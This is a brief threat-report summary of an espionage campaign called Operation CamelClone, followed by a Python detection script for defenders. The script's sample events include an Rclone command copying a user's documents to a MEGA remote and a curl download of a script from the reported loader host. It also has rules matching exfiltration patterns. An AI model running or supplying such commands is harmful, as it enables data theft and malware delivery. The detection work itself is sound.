Operation CamelClone: Multi-Region Espionage Campaign Targets Government and Defense Entities Amidst Regional Tensions
Seqrite Labs tracked Operation CamelClone, a coordinated campaign that uses spear-phishing ZIP attachments containing malicious LNK files to download a JavaScript loader dubbed HOPPINGANT from filebulldogs[.]com, which ultimately deploys Rclone (l.exe) to exfiltrate documents to MEGA. Targets span government, defense, diplomatic, and energy sectors in Algeria, Mongolia, Ukraine, and Kuwait, with decoys impersonating entities such as the Algerian Ministry of Housing, MonAtom LLC, and the Kuwaiti Armed Forces. #HOPPINGANT #filebulldogs #Rclone #MEGA #MonAtom
Operation CamelClone targets government, defense, and energy sectors in Algeria, Mongolia, Ukraine, and Kuwait using spear-phishing ZIPs with LNK files to deploy HOPPINGANT and exfiltrate data via Rclone to MEGA. #HOPPINGANT #Algeria #Espionage
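A triage sketch for the chain summarized above, added here as an example and not taken from the Seqrite report: it flags process-creation events where Rclone runs under another file name (the report's l.exe), where it transfers to a MEGA remote, or where a command line references the loader host. Field names follow Sysmon Event ID 1; the sample events, the remote name `mega1`, the paths and the assumption that the renamed binary keeps its `rclone.exe` version resource are all constructed for illustration.

```python
import ntpath
import re

# Indicators named in the summary; the host is stored defanged and refanged for matching.
LOADER_HOST = "filebulldogs[.]com".replace("[.]", ".")
RCLONE_ALIAS = "l.exe"

TRANSFER_VERB = re.compile(r"\s(copy|sync|move)\s")   # rclone transfer subcommands
MEGA_REMOTE = re.compile(r"(\bmega\w*:|--mega-)")     # remote named mega*: or a mega backend flag

def classify(event):
    """Return the rule names a Sysmon-style process-creation event matches."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Rule 1: the PE version resource says rclone.exe but the file on disk is named otherwise.
    if original == "rclone.exe" and image != "rclone.exe":
        hits.append("renamed_rclone")
    # Rule 2: an Rclone process (by resource or by the reported alias) moving data to MEGA.
    is_rclone = original == "rclone.exe" or image == RCLONE_ALIAS
    if is_rclone and TRANSFER_VERB.search(cmd) and MEGA_REMOTE.search(cmd):
        hits.append("rclone_to_mega")
    # Rule 3: any process whose command line references the loader-hosting domain.
    if LOADER_HOST in cmd:
        hits.append("loader_host")
    return hits

# Constructed sample events (not from the report); the downloading process is arbitrary.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\l.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"l.exe copy C:\Users\a\Documents mega1:docs --config C:\Users\Public\r.conf"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -o a.js https://" + LOADER_HOST + "/placeholder.js"},
    {"Image": r"C:\Program Files\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe sync D:\backup s3corp:nightly"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt"},
]

def triage(events):
    """Map each event's image path to the rules it triggered, dropping clean events."""
    return {e["Image"]: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS).items():
        print(image, rules)
```

The remote name is chosen by whoever writes the Rclone config, so rule 2 can miss a MEGA remote under an unrelated name; rule 1 does not depend on it.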